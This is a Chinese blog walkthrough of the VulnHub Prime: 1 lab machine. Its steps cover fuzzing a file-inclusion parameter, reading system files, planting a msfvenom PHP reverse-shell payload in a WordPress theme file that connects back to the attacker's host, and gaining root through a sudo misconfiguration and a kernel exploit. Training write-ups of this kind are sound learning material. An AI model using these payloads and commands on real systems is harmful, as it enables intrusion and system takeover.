vulnhub prime1通关

已于 2024-03-22 19:52:13 修改
阅读量1k 收藏 25
点赞数 33
文章标签: linux prime1 vulnhub 靶机通关
于 2024-03-22 18:45:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/136925537
版权

目录

环境安装

1.信息收集

收集IP

端口扫描

目录扫描

 目录文件扫描

查找参数

打Boss

远程文件读取

木马文件写入

权限提升

方法一

解锁密钥

方法二:

linux内核漏洞提权

总结

环境安装

Kali2021.4及其prime靶机

靶机安装:Prime: 1 ~ VulnHub

 解压后点击下面选中文件,选择虚拟机打开即可,

 然后修改一下设置,采用NAT模式就行,nat可以通过主机与外部网络连接,且有独立ip

 打开虚拟机即可

1.信息收集

收集IP

arp-scan -l

通过http://<ip>的形式访问,确定了靶机IP为192.168.232.128

端口扫描

nmap <ip>

 开启了22端口(ssh服务)、80端口(http)。

目录扫描

dirb http://192.168.232.128

访问/dev,发现提示,应该深度挖掘

 目录文件扫描

dirb http://192.168.232.128 -X .txt,.php,.html,.zip

 

 哦!secret.txt,快快快

提示:我们fuzz一下,然后就是github那个网址,还有查看location.txt,发现直接访问/location.txt并不行,那先放一放,看看github网站

具体如下:

COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something

查找参数

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZ=location.txt

 一大堆是line=7,应该都不是我们所需要的,随便试一个也没有回显,现在我们可以添加命令--h; 7 过滤line=7

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt  --hc 404 --hw 500 --hl 7 http://192.168.232.128/index.php?FUZZ=location.txt

发现file参数,此时猜测可能与文件包含有关,快快快传入file=location.txt试试,成功!

打Boss

远程文件读取

再看看/etc/passwd,看看,看来只限于读取location.txt文件

根据上述location的提示:出现下一个参数secrettier360,试试看

空空如也

不过之前还扫出个image.php吗?再在传参试试

成功,并且可以远程读文件,读个/etc/passwd试试,发现关键,现在再看看/home/saket/password.txt,读取到密码"follow_the_ippsec"。

猜测可能是ssh的密码,试试看

看来是不对了。

回看之前web目录扫描的时候,看到下列信息

访问看看,发现要登录

但是没有Username,不过我们不难看出,该网站是用wordpress搭建的,于是我们就是用专用于改模块的工具看看用户

wpscan --url http://192.168.232.128/wordpress -e

确定了用户名victor

登录看看,成功登录!

木马文件写入

一个一个看,最后发现Appearance-Theme Editor-secret.php这个文件可以更改内容,那就插入木马文件吧

kali可以使用msf来生成后木马文件(ip要改为kali的ip),其实传入一句话木马也行,然后蚁剑连接,但是后续我没有试过了

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.232.152 LPORT=7777  -o mshell.php

 启动msf

msfconsole  //启动
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.232.152
set lport 7777
run

此时就说明连接成功了

但是还要执行一个'shell'指令才能执行命令行,如下

权限提升

方法一

解锁密钥

先 whoami  查看用户

www-data,比一般的用户权限还要低。

看看我们能执行的

sudo -l

sudo -l 是一个在Unix/Linux系统(包括Kali Linux)中用于查询当前用户所拥有的sudo权限的命令。当你执行 sudo -l 时,系统会列出你作为当前用户可以执行哪些命令以及使用sudo时无需再次输入密码的命令配置。

 访问/home/saket/enc,权限不够,那我们看看别的

 

cat enc也行不通,但是由上图发现enc有执行权限,不管什么先执行看看

要输入密码,试试之前那个,如上没有任何回显,说明密码不对,但是一般而言对于密码系统都会有备份文件,试着找一下

find / -name '*backup*' 2>/dev/null  | less| sort


find /:在根目录寻找包含backup字符串的文件
2>/dev/null: /dev/null 是一个特殊的文件,它的作用是丢弃所有写入它的数据。即将错误输出重定向到 /dev/null 就相当于丢弃所有错误信息(例如权限不足),只保留正常输出
| less 把前的指令内容用less指令执行
| sort 把输出内容以以首字母排序

 找到可疑文件,查看试试

拿到可疑密码,backup_password

密码正确,权限不够,但是此时好像跟enc.txt,key.txt有关,那就看看

顺便看一下,又得知enc是一种openssl加密方式、key即为密钥

openssl解密

命令

echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}

{key}必须为十六进制编码
md5加密
echo -n "ippsec" | md5sum
转为十六进制
echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 |tr -d ' ' |tr -d '\n'

| od -An -t x1:管道 (|) 将 echo 输出的内容传递给 od(octal dump)命令。-An 参数表示不打印地址,-t x1 表示以十六进制形式输出每个字节。
| tr -d ' ':tr(translate)命令用于删除指定字符,这里的 -d ' ' 表示删除所有空格。
| tr -d '\n':再次使用 tr 命令删除所有的换行符(\n)。

然后把openssl的解密方法下载至CryptType文中

红线以下的内容全部保存在CryptType文件中

然后使用批解密的方式,进行解密

 for i in $(cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $i;done

 aes-256-cbc解密成功

 根据提示,有可能是ssh的端口的密码。

ssh saket@<ip>

成功连接,现在至升到了一般用户,接下来提权到root

继续看看可执行的命令,sudo -l

提示,到/home/victor/undefeated_victor,所以sudo /home/victor/undefeated_victor

然后我们可以执行一个python命令来优化命令执行

python -c 'import pty;pty.spawn("/bin/bash")'

 

使得$变为了saket@ubuntu,方便我们更好查看所属目录

再根据上上图片的提示,发现没有找到/tmp/challenge,应该是要我们自己创建

几乎要先cd /tmp 到该目录下

写入内容

#!/bin/bash
/bin/bash

在上述命令中,sudo 会让用户临时以root权限执行 /bin/bash,前提是你有足够的权限(即已授权sudo且知道sudo密码)。

 成功写入,但后附与该文件执行权限

chmod +x challenge

再次执行

sudo /home/victor/undefeated_victor

即可拿到root命令行

读取flag即可

下面展示未使用优化命令行,由于已经生成了challenge文件,就不比在演示了

方法二:

linux内核漏洞提权

此时还是在msf中的

查看内核版本

hostnamectl
或者
uname -a

再创建一个msf的窗口,查找内核漏洞

找到后,使用下述命令把它copy到家目录(~)下

cp /usr/share/exploitdb/exploits/linux/local/45010.c ~

用gcc编译它,并保存为yf文件(随便取)

gcc 45010.c -o yf

然后使用msf的upload指令把该文件放在靶机中

upload ~/yf /tmp/45010

然后shell,使用终端查看后,对该45010文件赋予(x)执行权限。最后 ./45010 执行该文件即可

 此处没有成功的原因是kali的版本过高了,没有成功。

一般执行之后应该是下图

然后就是到root目录下拿取root.txt就可以了。

总结

大致熟悉了渗透的过程,了解了msf的使用,以及Linux内核提权,解密钥等的方法。

Yf3_te
关注
vulnhub靶场-Prime1
ad12456的博客
03-30 2915
靶场练习,
vulnhub靶机DC-1
cyzCc的博客
02-15 1020
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
【学渗透靶机——prime
jieli0901227的博客
05-13 307
提示使用secrettier360作为参数在每一个php 页面,有参数没有值,那我们就在index.php 和image.php 上测试文件包含漏洞。这台靶机开放端口 22 80 端口 使用nmap 扫描只有枚举的信息, 22 端口也没有账密信息 ,所以重点放在80端口上。接下来直接拿webshell,打开我们最喜欢的主题编辑器,翻了半天,只有secret.php 存在写权限,写入反弹shell。页面提示我挖错文件了,,那就尝试读取location.txt.,如下图。查看enc 文件 无读权限。
红队打靶:Prime1详细打靶思路之模糊测试+内核提权(vulnhub
Bossfrank的博客
06-11 1861
本篇博客详述了vulnhub靶机prime1的打靶思路过程,并非简单复现writeup。打靶过程涉及到关于模糊测试及wfuzz工具的使用、文件包含漏洞利用、wordpress CMS、内核漏洞提权。有关OpenSSH渗透的方法将在下一篇博客中详述。
【网络安全渗透测试零基础入门必知必会】之Vulnhub靶机Prime使用指南,零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
08-28 778
前言这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段Vulnhub靶场实战阶段第1篇。
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1828
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
「红队笔记」靶机精讲:Prime1 - 信息收集和分析能力的试炼
m0_73612768的博客
12-12 1241
本文是作者在观看 B 站《红队笔记》后做的一些笔记及相关知识的补充。学渗透特别推荐大家去看。如有侵权,请联系作者,作者看到后会第一时间删除。
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1767
Vulnhub靶场Prime_Series_Level-1渗透
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
prime-number-1.zip_prime
09-21
标题中的"prime-number-1.zip_prime"提示我们这个压缩包主要关注的是与素数相关的主题。素数是数学中一个非常基础且重要的概念,它是指大于1且仅能被1和自身整除的自然数,比如2、3、5、7、11等。在密码学、计算机...
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
一次prime1靶场红队渗透实战,从主机发现到Linux内核漏洞提权
QQQPPPAAALLLZZZ的博客
07-03 982
使用了namp端口和存活主机扫描 ,dir目录扫描, FUZZ参数扫描 , MSF反弹连接,LINUX内核提权。完成了从访问页面->获取后台管理员权限 -> 获取操作系统权限 -> 获取root权限的全过程。
prime1靶场渗透
weixin_73562787的博客
07-18 334
靶场练习,详细全过程,prime1.0靶场
红队靶场之prime1靶机复现思路,wordpress反弹shell,shell执行ubuntu内核提权
m0_58116751的博客
05-18 1667
OK,我们看到目录扫描完毕,我们大致扫一眼就能看到里面最敏感的我认为就是/wordpress/w-admin 我们在做渗透测试的时候需要有一定的嗅觉,结合我们之前在nmap脚本扫描中确实看到了wordpress的个平台那么这个目录90%就是他的登录界面了然后还有几个可疑目录。我们猜想是正确的,我们简单尝试几个弱口令,都失败了进不去,那没有办法,我们暂且将他搁置,我们去看下背的目录,看能不能找到一些别的信息。我们去image看下。我们看到他的默认页面是kali的图片,看一眼源码也没有发现什么可以利用的东西。
vulnhub靶场】PRIME:1打靶过程记录
didiplus
07-17 3113
最近发现一个很有趣的靶场集合,里面涵盖了一些基本的漏洞,我们通过漏洞复现。了解一些网络安全的一些基本操作。
【技术分享】Prime靶场
Innocence_0的博客
07-23 131
本篇文章记录了靶场prime的打靶过程,包括如何渗透、getshell和提权等环节。小星认为,此次打靶过程极具挑战性和趣味性,期待各位读者与小星交流探讨。
vulnhub靶机练习之prime1
weixin_53665747的博客
06-04 172
这次靶机相对前两次有一点点绕,不过总体还是简单的难度。前几次的算比较容易,这个算容易。思路就是先利用目录扫描得到目录路径信息,在通过文件扫描得到提示文件,fuzz出参数进行文件包含读取web密码,进入后台执行反弹shell,利用系统漏洞提权。
prime1--vulnhub靶场通关教程
m0_74402888的博客
04-29 2391
是一个常用的命令行工具,用于从或向服务器传输数据,支持多种协议,如 HTTP、HTTPS、FTP 等。如果你得到了任何正确的参数,就按照下面的步骤操作。漏洞查找工具,可以通过操作系统或cms的版本号搜索到相应漏洞,通过查看说明即可找到漏洞利用方法。之前扫到了ssh,http wordpress,那密码对应的是什么服务呢。在现实生活中的渗透测试中,我们应该使用我们的工具来深入挖掘一个网站。//查看location.txt文件,你将得到下一步的行动指示//vm 编辑--查看虚拟网络编辑器,看到靶机的网段。
靶机精讲之Prime
m0_63285023的博客
04-09 352
dpkg -l 查看是否有python,有可以创建一个更好的shell。扫描靶机的wordpress(是php的重要平台)-hc筛选 -hh隐藏 -hw隐藏。那本地建设80端口服务器把利用文件上传。一般都是http优先然后再shh。用有文件包含的两个账号登录。写入php一句话做监听准备。image文件没有找到。构造一个zip文件测试。把shell.zip上传。错误写法,下面才是对的。找到web的登录界面。然后找到这个页面执行。
VegaPrime中文教程1:快速入门与实战应用
VegaPrime中文教程1是一本针对VegaPrime软件的入门指南,特别适用于Windows 2000、Windows XP Professional Edition、Solaris 8.0和Red Hat 8.0 Linux系统的用户。该教程由北京华力创通科技有限公司仿真系统事业部于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值